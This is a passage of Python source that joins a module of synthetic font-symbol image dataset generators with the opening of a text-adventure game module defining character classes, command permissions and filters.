        is_bold=False,
        background=lambda rng: rng.choice(background_options),
        foreground=lambda rng: rng.choice(foreground_options),
        rotation=0,
        scale=0.7,
        translation=(0.0, 0.0),
        inverse_color=False,
        pixel_noise_scale=0.0,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_dataset(n_samples, language="english", seed=None, **kwargs):
    """Generate white-on-black, centered, fixed-scale symbols.

    The only factors of variation are the character and the font.
    """
    white = SolidColor((1, 1, 1))
    black = SolidColor((0, 0, 0))
    attr_sampler = basic_attribute_sampler(
        alphabet=LANGUAGE_MAP[language].get_alphabet(support_bold=False),
        is_slant=False,
        is_bold=False,
        background=black,
        foreground=white,
        rotation=0,
        scale=0.7,
        translation=(0.0, 0.0),
        inverse_color=False,
        pixel_noise_scale=0.0,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_rotated_dataset(n_samples, language="english", seed=None, **kwargs):
    """Generate white-on-black centered symbols with a random rotation.

    The rotation angle is drawn uniformly in [0, pi); scale, translation and
    colors are fixed.
    """
    white = SolidColor((1, 1, 1))
    black = SolidColor((0, 0, 0))

    def random_rotation(rng):
        return rng.uniform(low=0, high=1) * math.pi

    attr_sampler = basic_attribute_sampler(
        alphabet=LANGUAGE_MAP[language].get_alphabet(support_bold=False),
        is_slant=False,
        is_bold=False,
        background=black,
        foreground=white,
        rotation=random_rotation,
        scale=1.0,
        translation=(0.0, 0.0),
        inverse_color=False,
        pixel_noise_scale=0.0,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_translated_dataset(n_samples, language="english", seed=None, **kwargs):
    """Generate white-on-black symbols with a random translation.

    Each translation coordinate is drawn uniformly in [-1, 1]; rotation,
    scale and colors are fixed.
    """
    white = SolidColor((1, 1, 1))
    black = SolidColor((0, 0, 0))

    def random_translation(rng):
        return tuple(rng.uniform(low=-1, high=1, size=2))

    attr_sampler = basic_attribute_sampler(
        alphabet=LANGUAGE_MAP[language].get_alphabet(support_bold=False),
        is_slant=False,
        is_bold=False,
        background=black,
        foreground=white,
        rotation=0,
        scale=1.0,
        translation=random_translation,
        inverse_color=False,
        pixel_noise_scale=0.0,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_scaled_dataset(n_samples, language="english", seed=None, **kwargs):
    """Generate white-on-black centered symbols with varying scale.

    ``scale=None`` delegates the scale to the attribute sampler's default
    random behavior; all other attributes are fixed.
    """
    white = SolidColor((1, 1, 1))
    black = SolidColor((0, 0, 0))
    attr_sampler = basic_attribute_sampler(
        alphabet=LANGUAGE_MAP[language].get_alphabet(support_bold=False),
        is_slant=False,
        is_bold=False,
        background=black,
        foreground=white,
        rotation=0,
        scale=None,  # sampler default: random scale
        translation=(0.0, 0.0),
        inverse_color=False,
        pixel_noise_scale=0.0,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_bold_dataset(n_samples, language="english", seed=None, **kwargs):
    """Generate white-on-black, centered, fixed-scale symbols in bold."""
    white = SolidColor((1, 1, 1))
    black = SolidColor((0, 0, 0))
    attr_sampler = basic_attribute_sampler(
        alphabet=LANGUAGE_MAP[language].get_alphabet(support_bold=True),
        is_slant=False,
        is_bold=True,
        background=black,
        foreground=white,
        rotation=0,
        scale=1.0,
        translation=(0.0, 0.0),
        inverse_color=False,
        pixel_noise_scale=0.0,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_italic_dataset(n_samples, language="english", seed=None, **kwargs):
    """Generate white-on-black, centered, fixed-scale slanted (italic) symbols.

    The only factors of variation are the character and the font.
    """
    white = SolidColor((1, 1, 1))
    black = SolidColor((0, 0, 0))
    attr_sampler = basic_attribute_sampler(
        alphabet=LANGUAGE_MAP[language].get_alphabet(support_bold=False),
        is_slant=True,
        is_bold=False,
        background=black,
        foreground=white,
        rotation=0,
        scale=1.0,
        translation=(0.0, 0.0),
        inverse_color=False,
        pixel_noise_scale=0.0,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_gradient_dataset(n_samples, language="english", seed=None, **kwargs):
    """Generate centered, fixed-scale symbols with the sampler's default colors.

    Foreground and background are left unspecified, so the attribute sampler
    draws its default (random pattern) colors; character and font are the
    remaining factors of variation.
    """
    attr_sampler = basic_attribute_sampler(
        alphabet=LANGUAGE_MAP[language].get_alphabet(support_bold=False),
        is_slant=False,
        is_bold=False,
        rotation=0,
        scale=1.0,
        translation=(0.0, 0.0),
        inverse_color=False,
        pixel_noise_scale=0.0,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_natural_dataset(n_samples, language="english", seed=None, **kwargs):
    """Generate centered, fixed-scale symbols over random natural-image patterns.

    Both foreground and background are ``ImagePattern`` instances with a
    fresh random seed per sample; rotation, scale and translation are fixed.
    (The previous docstring incorrectly described this as white on black.)
    """
    alphabet = LANGUAGE_MAP[language].get_alphabet(support_bold=False)
    attr_sampler = basic_attribute_sampler(
        alphabet=alphabet,
        background=lambda rng: ImagePattern(seed=rand_seed(rng)), #lambda rng: Gradient(seed=rand_seed(_rng))
        foreground=lambda rng: ImagePattern(seed=rand_seed(rng)),
        is_slant=False,
        is_bold=False,
        rotation=0,
        scale=1.0,
        translation=(0.0, 0.0),
        inverse_color=False,
        pixel_noise_scale=0.0,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_plain_camouflage_dataset(n_samples, language="english", seed=None, **kwargs):
    """Generate centered symbols on camouflage foreground/background.

    Foreground and background use perpendicular camouflage stroke patterns,
    so the pixel statistics are similar on both sides of the symbol boundary.

    Bug fix: the scale used to be drawn *once per dataset* from the global
    numpy RNG (ignoring ``seed``), so all samples shared a single scale and
    the dataset was not reproducible.  The scale is now drawn per sample
    from the sampler's own RNG, matching the sibling camouflage generator.
    """
    alphabet = LANGUAGE_MAP[language].get_alphabet(support_bold=False)
    angle = 0
    fg = Camouflage(stroke_angle=angle, stroke_width=0.1, stroke_length=0.6, stroke_noise=0)
    bg = Camouflage(stroke_angle=angle + np.pi / 2, stroke_width=0.1, stroke_length=0.6, stroke_noise=0)

    def scale(rng):
        # Log-normal jitter around 0.7, seeded through the sampler's rng.
        return 0.7 * np.exp(rng.randn() * 0.1)

    attr_sampler = basic_attribute_sampler(
        alphabet=alphabet,
        is_slant=False,
        is_bold=False,
        background=bg,
        foreground=fg,
        rotation=0,
        scale=scale,
        translation=(0.0, 0.0),
        inverse_color=False,
        pixel_noise_scale=0.0,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_tiny_dataset(n_samples, language="english", seed=None, **kwarg):
    """Generate an 8x8, gray-scale dataset at scale 1 with minimal variation."""
    white = SolidColor((1, 1, 1))
    black = SolidColor((0, 0, 0))
    attr_sampler = basic_attribute_sampler(
        alphabet=LANGUAGE_MAP[language].get_alphabet(support_bold=False),
        background=black,
        foreground=white,
        is_bold=False,
        is_slant=False,
        scale=1,
        resolution=(8, 8),
        is_gray=True,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_default_dataset(n_samples, language="english", seed=None, **kwarg):
    """Generate the default dataset: all attributes at their sampler defaults
    (random gradient foreground and background)."""
    alphabet = LANGUAGE_MAP[language].get_alphabet()
    attr_sampler = basic_attribute_sampler(alphabet=alphabet)
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_solid_bg_dataset(n_samples, language="english", seed=None, **kwarg):
    """Same as the default dataset, but rendered white on black."""
    white = SolidColor((1, 1, 1))
    black = SolidColor((0, 0, 0))
    attr_sampler = basic_attribute_sampler(
        alphabet=LANGUAGE_MAP[language].get_alphabet(),
        background=black,
        foreground=white,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_natural_images_dataset(n_samples, language="english", seed=None, **kwargs):
    """Same as the default dataset, but foreground and background are random
    natural-image patterns (fresh seed per sample)."""
    def random_pattern(rng):
        return ImagePattern(seed=rand_seed(rng))

    attr_sampler = basic_attribute_sampler(
        alphabet=LANGUAGE_MAP[language].get_alphabet(),
        background=random_pattern,
        foreground=random_pattern,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_korean_1k_dataset(n_samples, seed=None, **kwarg):
    """Generate a dataset over the first 1000 Korean symbols (bold-capable fonts)."""
    alphabet = LANGUAGE_MAP["korean"].get_alphabet(support_bold=True)
    first_1k = alphabet.symbols[:1000]

    def pick_char(rng):
        return rng.choice(first_1k)

    def pick_font(rng):
        return rng.choice(alphabet.fonts)

    attr_sampler = basic_attribute_sampler(char=pick_char, font=pick_font)
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_camouflage_dataset(n_samples, language="english", texture="camouflage", seed=None, **kwarg):
    """Generate bold symbols whose pixel distribution is similar for the
    foreground and the background.

    Args:
        n_samples: number of images to generate.
        language: language key for the alphabet (bold-capable fonts).
        texture: "camouflage" (perpendicular stroke patterns), "shade"
            (sampler-default random patterns) or "bw" (white on black, used
            as a non-camouflage control).
        seed: dataset seed passed to ``dataset_generator``.

    Raises:
        ValueError: if ``texture`` is not one of the supported values.

    Bug fix: the scale used to be drawn from the *global* numpy RNG inside
    the sampler (ignoring the per-sample seed), breaking reproducibility.
    It is now drawn from the sampler's own RNG.
    """
    def attr_sampler(seed=None):
        if texture == "camouflage":
            angle = 0
            fg = Camouflage(stroke_angle=angle, stroke_width=0.1, stroke_length=0.6, stroke_noise=0)
            bg = Camouflage(stroke_angle=angle + np.pi / 2, stroke_width=0.1, stroke_length=0.6, stroke_noise=0)
        elif texture == "shade":
            fg, bg = None, None
        elif texture == "bw":
            fg = SolidColor((1, 1, 1))
            bg = SolidColor((0, 0, 0))
        else:
            raise ValueError("Unknown texture %s." % texture)

        def scale(rng):
            # Log-normal jitter around 0.7, seeded through the sampler's rng.
            return 0.7 * np.exp(rng.randn() * 0.1)

        return basic_attribute_sampler(
            alphabet=LANGUAGE_MAP[language].get_alphabet(support_bold=True),
            background=bg,
            foreground=fg,
            is_bold=True,
            is_slant=False,
            scale=scale,
        )(seed)

    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_non_camou_bw_dataset(n_samples, language="english", seed=None, **kwargs):
    """Black-and-white control dataset with the same attribute distribution
    as the camouflage dataset."""
    return generate_camouflage_dataset(n_samples, language=language, texture="bw", seed=seed, **kwargs)
def generate_non_camou_shade_dataset(n_samples, language="english", seed=None, **kwargs):
    """Shaded (default pattern) control dataset with the same attribute
    distribution as the camouflage dataset."""
    return generate_camouflage_dataset(n_samples, language=language, texture="shade", seed=seed, **kwargs)
# for segmentation, detection, counting
# -------------------------------------
def generate_segmentation_dataset(n_samples, language="english", resolution=(128, 128), seed=None, **kwarg):
    """Generate scenes of 3-9 symbols with varying scale, rotation and
    translation (no bold), with per-symbol masks flattened for segmentation."""
    def random_scale(rng):
        # Log-normal jitter around 0.1.
        return 0.1 * np.exp(rng.randn() * 0.4)

    def random_count(rng):
        return rng.choice(list(range(3, 10)))

    attr_generator = basic_attribute_sampler(
        alphabet=LANGUAGE_MAP[language].get_alphabet(support_bold=False),
        resolution=resolution,
        scale=random_scale,
        is_bold=False,
        n_symbols=random_count,
    )
    return dataset_generator(attr_generator, n_samples, flatten_mask, dataset_seed=seed)
def generate_counting_dataset(
    n_samples, language="english", resolution=(128, 128), n_symbols=None, scale_variation=0.5, seed=None, **kwarg
):
    """Generate counting scenes with several symbols at varying scales.

    Each symbol is the character 'a' with probability 0.7, otherwise a
    random symbol from the (non-bold) alphabet of ``language``.

    Args:
        n_symbols: callable ``rng -> int`` giving the symbol count per
            image; defaults to uniform over 3..9.
        scale_variation: std-dev of the log-normal scale jitter around 0.1.
    """
    if n_symbols is None:
        def n_symbols(rng):
            return rng.choice(list(range(3, 10)))

    def random_scale(rng):
        return 0.1 * np.exp(rng.randn() * scale_variation)

    def char_sampler(rng):
        # 30% chance of a random alphabet symbol, otherwise 'a'.
        if rng.rand() < 0.3:
            return rng.choice(LANGUAGE_MAP[language].get_alphabet(support_bold=False).symbols)
        return "a"

    attr_generator = basic_attribute_sampler(
        char=char_sampler, resolution=resolution, scale=random_scale, is_bold=False, n_symbols=n_symbols
    )
    return dataset_generator(attr_generator, n_samples, flatten_mask, dataset_seed=seed)
def generate_counting_dataset_scale_fix(n_samples, seed=None, **kwargs):
    """Counting dataset variant with zero scale variation (fixed scale).

    Symbol count and character distribution are as in
    ``generate_counting_dataset``.
    """
    return generate_counting_dataset(n_samples, scale_variation=0, seed=seed, **kwargs)
def generate_counting_dataset_crowded(n_samples, seed=None, **kwargs):
    """Crowded counting variant: 30-49 symbols per image with small scale
    jitter; character distribution as in ``generate_counting_dataset``."""
    def crowded_count(rng):
        return rng.choice(list(range(30, 50)))

    return generate_counting_dataset(n_samples, scale_variation=0.1, n_symbols=crowded_count, seed=seed, **kwargs)
# for few-shot learning
# ---------------------
def all_chars(n_samples, seed=None, **kwarg):
    """Combines the symbols of all languages (up to 200 per languages).
    Note: some fonts may appear rarely.
    """
    # build a flat list of (symbol, alphabet) pairs across every language
    symbols_list = []
    for language in LANGUAGE_MAP.values():
        alphabet = language.get_alphabet()
        # cap the number of symbols contributed per alphabet
        symbols = alphabet.symbols[:200]
        logging.info("Using %d/%d symbols from alphabet %s", len(symbols), len(alphabet.symbols), alphabet.name)
        symbols_list.extend(zip(symbols, [alphabet] * len(symbols)))
    def attr_sampler(seed=None):
        # NOTE(review): the symbol is drawn from the *global* np.random
        # stream, not from a seeded rng, so this choice is not controlled
        # by `seed` -- confirm this is intended.
        char, alphabet = symbols_list[np.random.choice(len(symbols_list))]
        return basic_attribute_sampler(alphabet=alphabet, char=char)(seed)
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def generate_balanced_font_chars_dataset(n_samples, seed=None, **kwarg):
    """Samples uniformly from all fonts (max 200 per alphabet)
    or uniformly from all symbols (max 200 per alphabet)
    with probability 50%.
    """
    # flat lists of (font, alphabet) and (symbol, alphabet) pairs
    font_list = []
    symbols_list = []
    for language in LANGUAGE_MAP.values():
        alphabet = language.get_alphabet()
        # cap contributions per alphabet to keep languages balanced
        fonts = alphabet.fonts[:200]
        symbols = alphabet.symbols[:200]
        logging.info("Using %d/%d fonts from alphabet %s", len(fonts), len(alphabet.fonts), alphabet.name)
        font_list.extend(zip(fonts, [alphabet] * len(fonts)))
        logging.info("Using %d/%d symbols from alphabet %s", len(symbols), len(alphabet.symbols), alphabet.name)
        symbols_list.extend(zip(symbols, [alphabet] * len(symbols)))
    logging.info("Total n_fonts: %d, n_symbols: %d.", len(font_list), len(symbols_list))
    def attr_sampler(seed=None):
        # NOTE(review): draws from the *global* np.random stream rather
        # than a seeded rng, so these choices are not controlled by
        # `seed` -- confirm this is intended.
        if np.random.rand() > 0.5:
            # 50%: pick a font uniformly, then a symbol from its alphabet
            font, alphabet = font_list[np.random.choice(len(font_list))]
            symbol = np.random.choice(alphabet.symbols[:200])
        else:
            # 50%: pick a symbol uniformly, then a font from its alphabet
            symbol, alphabet = symbols_list[np.random.choice(len(symbols_list))]
            font = np.random.choice(alphabet.fonts[:200])
        return basic_attribute_sampler(char=symbol, font=font, is_bold=False, is_slant=False)(seed)
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
# for active learning
# -------------------
def generate_large_translation(n_samples, language="english", seed=None, **kwarg):
    """Symbols are translated beyond the border of the image to create
    a cropping effect. Scale is fixed to 0.5.
    """
    def far_translation(rng):
        # uniform in [-2, 2)^2 -- far enough to push glyphs off-canvas
        return tuple(rng.rand(2) * 4 - 2)

    attr_sampler = basic_attribute_sampler(
        alphabet=LANGUAGE_MAP[language].get_alphabet(),
        scale=0.5,
        translation=far_translation,
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
def missing_symbol_dataset(n_samples, language="english", seed=None, **kwarg):
    """With 10% probability, no symbols are drawn"""
    def translation(rng):
        # 90%: a normal in-frame translation; 10%: push the symbol
        # completely out of frame (translation of 10)
        return tuple(rng.rand(2) * 2 - 1) if rng.rand() > 0.1 else 10

    def background(rng):
        return MultiGradient(alpha=0.5, n_gradients=2, types=("linear", "radial"), seed=rand_seed(rng))

    attr_generator = basic_attribute_sampler(
        alphabet=LANGUAGE_MAP[language].get_alphabet(),
        translation=translation,
        background=background,
    )
    return dataset_generator(attr_generator, n_samples, dataset_seed=seed)
def generate_some_large_occlusions(n_samples, language="english", seed=None, **kwarg):
    """With probability 20%, add a large occlusion
    over the existing symbol.
    """
    def occlusion_count(rng):
        # one occluder 20% of the time, none otherwise
        return 1 if rng.rand() < 0.2 else 0

    attr_sampler = add_occlusion(
        basic_attribute_sampler(alphabet=LANGUAGE_MAP[language].get_alphabet()),
        n_occlusion=occlusion_count,
        # large occluders: log-normal scale around 0.6
        scale=lambda rng: 0.6 * np.exp(rng.randn() * 0.1),
        # occluders may land well outside the frame: uniform in [-3, 3)^2
        translation=lambda rng: tuple(rng.rand(2) * 6 - 3),
    )
    return dataset_generator(attr_sampler, n_samples, flatten_mask_except_first, dataset_seed=seed)
def generate_many_small_occlusions(n_samples, language="english", seed=None, **kwarg):
    """Add small occlusions on all images.
    Number of occlusions is sampled uniformly from {0, ..., 4}.
    """
    base_sampler = basic_attribute_sampler(alphabet=LANGUAGE_MAP[language].get_alphabet())
    attr_sampler = add_occlusion(base_sampler, n_occlusion=lambda rng: rng.randint(0, 5))
    return dataset_generator(attr_sampler, n_samples, flatten_mask_except_first, dataset_seed=seed)
def generate_pixel_noise(n_samples, language="english", seed=None, **kwarg):
    """Add large pixel noise (scale 0.3) with probability 0.1.

    NOTE(review): an earlier docstring said "probability 0.5", but the
    code below only applies noise when rng.rand() <= 0.1.
    """
    def pixel_noise(rng):
        # 90%: no noise; 10%: noise scale of 0.3
        if rng.rand() > 0.1:
            return 0
        else:
            return 0.3
    attr_sampler = basic_attribute_sampler(
        alphabet=LANGUAGE_MAP[language].get_alphabet(), pixel_noise_scale=pixel_noise
    )
    return dataset_generator(attr_sampler, n_samples, dataset_seed=seed)
# for font classification
# -----------------------
def less_variations(n_samples, language="english", seed=None, **kwarg):
    """Less variations in scale and rotations.
    Also, no bold and no italic. This makes a more accessible font
    classification task.
    """
    alphabet = LANGUAGE_MAP[language].get_alphabet()
    attr_generator = basic_attribute_sampler(
        alphabet=alphabet,
        is_bold=False,
        is_slant=False,
        # tight log-normal scale around 0.5 and near-zero rotation
        scale=lambda rng: 0.5 * np.exp(rng.randn() * 0.1),
        rotation=lambda rng: rng.randn() * 0.1,
    )
    return dataset_generator(attr_generator, n_samples, dataset_seed=seed)
# Registry mapping public dataset names (as used on the command line /
# in configs) to the generator functions defined above.
DATASET_GENERATOR_MAP = {
    "plain": generate_plain_dataset,
    "default": generate_default_dataset,
    "default-bw": generate_solid_bg_dataset,
    "korean-1k": generate_korean_1k_dataset,
    "camouflage": generate_camouflage_dataset,
    "non-camou-bw": generate_non_camou_bw_dataset,
    "non-camou-shade": generate_non_camou_shade_dataset,
    "segmentation": generate_segmentation_dataset,
    "counting": generate_counting_dataset,
    "counting-fix-scale": generate_counting_dataset_scale_fix,
    "counting-crowded": generate_counting_dataset_crowded,
    "missing-symbol": missing_symbol_dataset,
    "some-large-occlusion": generate_some_large_occlusions,
    "many-small-occlusion": generate_many_small_occlusions,
    "large-translation": generate_large_translation,
    "tiny": generate_tiny_dataset,
    "balanced-font-chars": generate_balanced_font_chars_dataset,
    "all-chars": all_chars,
    "less-variations": less_variations,
    "pixel-noise": generate_pixel_noise,
    "natural-patterns": generate_natural_images_dataset,
}
# --- swampymud/character.py ---
"""Module defining the CharacterClass metaclass and Character class,
which serves as the basis for all in-game characters.
This module also defines the 'Filter', used for CharacterClass-based
permissions systems, and 'Command', a wrapper that converts methods into
commands that can be invoked by characters.
"""
import enum
import functools
import inspect
import weakref
import asyncio
import swampymud.inventory as inv
from swampymud import util
from swampymud.util.shadowdict import ShadowDict
class Filter:
    """Filter for screening out certain CharacterClasses and Characters

    _classes - set of CharacterClasses tracked by the filter
    _include_chars - set of characters to be included
    _exclude_chars - set of characters to be excluded
    _mode - Filter.WHITELIST or Filter.BLACKLIST
        if WHITELIST is selected, only characters whose class is in
        _classes are allowed through the filter.
        if BLACKLIST is selected, only characters whose class is NOT
        in _classes are allowed through the filter.
    Note that _include_chars / _exclude_chars take precedence over
    the _classes. That is, if a WHITELIST includes the class
    Wizard, but Bill the Wizard is in _exclude_chars, Bill will not
    be permitted through the filter.
    """
    class _FilterMode(enum.Enum):
        """Enum representing whether a filter includes or excludes the
        classes that it tracks"""
        WHITELIST = True
        BLACKLIST = False
    # aliases so callers can write Filter.WHITELIST / Filter.BLACKLIST
    WHITELIST = _FilterMode.WHITELIST
    BLACKLIST = _FilterMode.BLACKLIST
    def __init__(self, mode, classes=(),
                 include_chars=(), exclude_chars=()):
        """initialize a Filter with [mode]
        [mode] may be a _FilterMode, a bool, or a string:
            True / "whitelist" makes the Filter act as a whitelist
            False / "blacklist" makes the Filter act as a blacklist
        [classes] are those classes to be whitelisted/blacklisted
        [include_chars] are specific characters to be included
        [exclude_chars] are specific characters to be excluded
        Raises ValueError if a character appears in both
        [include_chars] and [exclude_chars], or if [mode] is not
        recognized.
        """
        self._classes = set(classes)
        # one membership test per included character suffices to detect
        # overlap (checking both directions, as before, was redundant)
        for char in include_chars:
            if char in exclude_chars:
                raise ValueError("Cannot have character in both include"
                                 " and exclude")
        # store characters in a WeakSet, so that the Filter will not
        # prevent them from getting garbage collected
        self._include_chars = weakref.WeakSet(include_chars)
        self._exclude_chars = weakref.WeakSet(exclude_chars)
        if isinstance(mode, self._FilterMode):
            self._mode = mode
        elif isinstance(mode, bool):
            self._mode = Filter.WHITELIST if mode else Filter.BLACKLIST
        else:
            # fall back to parsing a mode string
            if mode.lower() == "whitelist":
                self._mode = Filter.WHITELIST
            elif mode.lower() == "blacklist":
                self._mode = Filter.BLACKLIST
            else:
                raise ValueError("Unrecognized mode %s" % repr(mode))
    def permits(self, other):
        """returns True if Character/CharacterClass is allowed in
        the individual Character is evaluated first,
        then the Character's class, then all the Character's
        ancestor classes
        """
        if isinstance(other, Character):
            # per-character include/exclude takes precedence over class
            if other in self._include_chars:
                return True
            elif other in self._exclude_chars:
                return False
            # now try the Character's class
            other = type(other)
        if isinstance(other, CharacterClass):
            # cycle through each ancestor
            ancestors = filter(lambda x: isinstance(x, CharacterClass),
                               other.__mro__)
            for char_class in ancestors:
                if char_class in self._classes:
                    # tracked: permitted iff this is a whitelist
                    return self._mode.value
        # "other" is neither a CharClass nor Character
        else:
            return False
        # the character / ancestors cannot be found in the list
        return not self._mode.value
    def include(self, other):
        """Set the filter to return 'True' if [other] is supplied
        to permit()"""
        # check that other is a Character / CharacterClass
        if isinstance(other, CharacterClass):
            if self._mode is Filter.WHITELIST:
                self._classes.add(other)
            else:
                # blacklist: stop tracking the class so it passes
                if other in self._classes:
                    self._classes.remove(other)
        elif isinstance(other, Character):
            if other in self._exclude_chars:
                self._exclude_chars.remove(other)
            self._include_chars.add(other)
        else:
            raise ValueError("Expected Character/CharacterClass,"
                             " received %s" % type(other))
    def exclude(self, other):
        """Set the filter to return 'False' if [other] is supplied
        to permit()"""
        # check that other is a Character / CharacterClass
        if isinstance(other, CharacterClass):
            if self._mode == Filter.WHITELIST:
                # whitelist: stop tracking the class so it is refused
                if other in self._classes:
                    self._classes.remove(other)
            else:
                self._classes.add(other)
        elif isinstance(other, Character):
            if other in self._include_chars:
                self._include_chars.remove(other)
            self._exclude_chars.add(other)
        else:
            raise ValueError("Expected Character/CharacterClass,"
                             f" received {type(other)}")
    def __repr__(self):
        """overriding repr()"""
        return "Filter({!r}, {!r}, {!r}, {!r})".format(
            self._mode.value,
            set(self._classes),
            set(self._include_chars), set(self._exclude_chars)
        )
    @staticmethod
    def from_dict(filter_dict):
        """returns a Filter pythonic representation [filter_dict]"""
        return Filter(**filter_dict)
    def to_dict(self):
        """returns a pythonic representation of this Filter
        (empty fields are omitted; inverse of from_dict)"""
        data = {"mode" : self._mode.value}
        if self._classes:
            data["classes"] = list(self._classes)
        if self._include_chars:
            data["include_chars"] = list(self._include_chars)
        if self._exclude_chars:
            data["exclude_chars"] = list(self._exclude_chars)
        return data
class Command(functools.partial):
    """A subclass of functools.partial that supports equality.
    The default implementation of functools.partial does not normally
    support equality for mathematically sound reasons:
    https://bugs.python.org/issue3564
    With this class's equality operators, we aren't trying to solve an
    undecidable problem, but just confirm that two partially-applied
    functions have the same arguments and underlying functions.
    Optional fields, "name", "label", and "field" are also provided.
    These fields store player-relevant information that are NOT factored
    into comparisons.
    In addition, this class has a convenience method, '.specify' to
    derive a new Command from an existing one by simply adding
    additional arguments. All other information (base function, names,
    etc.) will be propagated.
    While you can update Command.keywords, avoid doing so.
    All comparisons are based on the INITIAL keywords, so changing
    keywords after initialization is unsupported.
    """
    def __init__(self, *args, **kwargs):
        """initialize a Command like a functools.partial object"""
        # functools.partial.__new__ already consumed args/kwargs;
        # super().__init__() takes none
        super().__init__()
        # creating an immutable set of keywords for comparisons
        self._keys = frozenset(self.keywords.items())
        # propagate the name and doc from the base function
        self.__name__ = self.func.__name__
        self.__doc__ = self.func.__doc__
        # try to clean the docstring, if one was provided
        try:
            self.__doc__ = inspect.cleandoc(self.__doc__)
        except AttributeError:
            # base function had no docstring (__doc__ is None)
            pass
        # initialize satellite data
        self.name = None
        self.label = None
        # by default, add a filter that permits all (empty blacklist)
        self.filter = Filter(Filter.BLACKLIST)
    def __eq__(self, other):
        """Two commands are equal iff the base functions are equal,
        the args are equal, and the (initial) keywords are equal"""
        try:
            return (self.func, self.args, self._keys) == \
                   (other.func, other.args, other._keys)
        except AttributeError:
            # other is not a Command
            return False
    def __hash__(self):
        """overriding hash (consistent with __eq__ above)"""
        return hash((self.func, self.args, self._keys))
    def specify(self, *newargs, **new_keywords) -> 'Command':
        """Derive a new version of this function by applying additional
        arguments.
        If a provided keyword argument conflicts with a prior argument,
        the prior argument will be overriden.
        """
        args = self.args + tuple(newargs)
        keywords = self.keywords.copy()
        keywords.update(new_keywords)
        new_cmd = Command(self.func, *args, **keywords)
        # propagate the name and source
        new_cmd.name = self.name
        new_cmd.label = self.label
        # note that a new filter is not created, so any changes to the
        # old NewCommand will change to the old Command, and visa versa
        new_cmd.filter = self.filter
        return new_cmd
    def __str__(self):
        """returns the name of this command
        if no name is provided, func.__name__ is used
        """
        if self.name is None:
            return self.func.__name__
        return self.name
    def help_entry(self) -> str:
        """return a help message for this command"""
        if self.label is not None:
            return f"{self} [from {self.label}]:\n{self.__doc__}"
        return f"{self}:\n{self.__doc__}"
    @staticmethod
    def with_traits(name: str = None, label: str = None,
                    filter: Filter = None):
        """decorator to easily wrap a function additional traits
        [name] = to invoke this Command, the Character must use [name]
        instead of the function's name
        [label] = the type of the command. (Affects help menu.)
        [filter] = if provided, determine which Characters / Classes
        are permitted to use this command. """
        # (parameter name 'filter' shadows the builtin, but renaming it
        # would break keyword callers)
        def decorator(func):
            cmd = Command(func)
            cmd.name = name
            cmd.label = label
            if filter is not None:
                cmd.filter = filter
            return cmd
        return decorator
class CharacterClass(type):
    """metaclass establishing basic Character behaviors
    CharacterClasses include the following important attributes:
    - classname: how the class appears to the players
    - frequency: how often will new players spawn as this class
    - command_label: how commands from this class appear in help menu
    """
    def __init__(cls, name, bases, namespace):
        # add the proper name, if not already provided
        # (e.g. "DarkWizard" -> "Dark Wizard")
        if "classname" not in namespace:
            cls.classname = util.camel_to_space(name)
        # add a frequency field, if not already provided
        if "frequency" not in namespace:
            cls.frequency = 1
        # add a "command_label", if not already provided
        # this field is used in creating help menus
        if "command_label" not in namespace:
            cls.command_label = f"{cls} Commands"
        # commands that were implemented for this class
        # (Command objects found directly in this class's namespace)
        cls._local_commands = {}
        for value in namespace.values():
            if isinstance(value, Command):
                value.label = cls.command_label
                cls._local_commands[str(value)] = value
        # all commands, with the most recent commands exposed
        # (walk the MRO base-first so subclasses override ancestors)
        cls._commands = {}
        for base in reversed(cls.__mro__):
            if not isinstance(base, CharacterClass):
                continue
            cls._commands.update(base._local_commands)
        cls._commands.update(cls._local_commands)
        # calling the super init
        super().__init__(name, bases, namespace)
    def __str__(cls):
        """overriding str to return classname"""
        return cls.classname
class Character(metaclass=CharacterClass):
    """Base class for all other CharacterClasses.
    Provides messaging, command parsing, location handling, and
    inventory / equipment management for in-game characters.
    """
    # How this class appears to players
    classname = "Default Character"
    # Starting location for this class
    starting_location = None
    # Commands from this class will be labeled "Default Commands"
    command_label = "Default Commands"
    # Valid equip slots for characters of this class
    equip_slots = []
    def __init__(self, name=None):
        """initialize a Character with an optional [name]
        (nameless characters pick a name via the join parser)"""
        super().__init__()
        self._name = name
        self.location = None
        # outgoing messages, drained by this character's controller
        self.msgs = asyncio.Queue()
        # build dict from Commands collected by CharacterClass
        self.cmd_dict = ShadowDict()
        for (name, cmd) in self._commands.items():
            # bind this instance as the command's first argument
            cmd = cmd.specify(self)
            # add command only if filter permits it
            if cmd.filter.permits(self):
                self.cmd_dict[name] = cmd
            # because sCommands are not bound properly like a normal
            # method, we must manually bind the methods
            # TODO: override getattribute__ to solve the super() issue?
            if isinstance(getattr(self, cmd.func.__name__), Command):
                setattr(self, cmd.func.__name__, cmd)
        # set up inventory and equipping items
        self.inv = inv.Inventory()
        self.equip_dict = inv.EquipTarget.make_dict(*self.equip_slots)
        # put character in default command parsing mode
        self._parser = self._command_parser
    def message(self, msg):
        """send a message to the controller of this character"""
        # enqueue without blocking; the controller drains self.msgs
        self.msgs.put_nowait(msg)
    def command(self, msg):
        """issue 'msg' to character.
        character will parse 'msg' using its current parser."""
        # NOTE(review): only empty strings are filtered here; a
